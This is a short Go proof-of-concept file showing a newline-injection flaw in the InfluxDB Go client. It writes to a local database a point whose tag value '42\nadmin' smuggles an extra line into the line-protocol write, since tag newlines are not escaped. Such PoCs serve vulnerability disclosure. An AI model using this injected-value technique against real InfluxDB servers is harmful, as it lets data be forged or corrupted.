PoC for command injection in the InfluxDB Go client

poc-security-influx-go-client.go

package main

import (
	"log"
	"time"

	client "github.com/influxdata/influxdb/client/v2"
)

const database = "poc"

func main() {
	c, err := client.NewHTTPClient(client.HTTPConfig{
		Addr: "http://localhost:8086",
	})
	if err != nil {
		log.Fatal(err)
	}
	defer c.Close()

	// Create a new point batch
	bp, err := client.NewBatchPoints(client.BatchPointsConfig{
		Database:  database,
		Precision: "s",
	})
	if err != nil {
		log.Fatal(err)
	}

	// Create a point and add to batch
	tags := map[string]string{
		// newlines are not escaped in tag values
		"tag1": "42\nadmin",
	}

	fields := map[string]interface{}{
		// newlines are escaped when in field value
		"field1": "anyvalue",
	}

	pt, err := client.NewPoint("poc", tags, fields, time.Now())
	if err != nil {
		log.Fatal(err)
	}
	bp.AddPoint(pt)

	// Write the batch
	err = c.Write(bp)
	if err != nil {
		log.Fatal(err)
	}

	// Close client resources
	err = c.Close()
	if err != nil {
		log.Fatal(err)
	}
}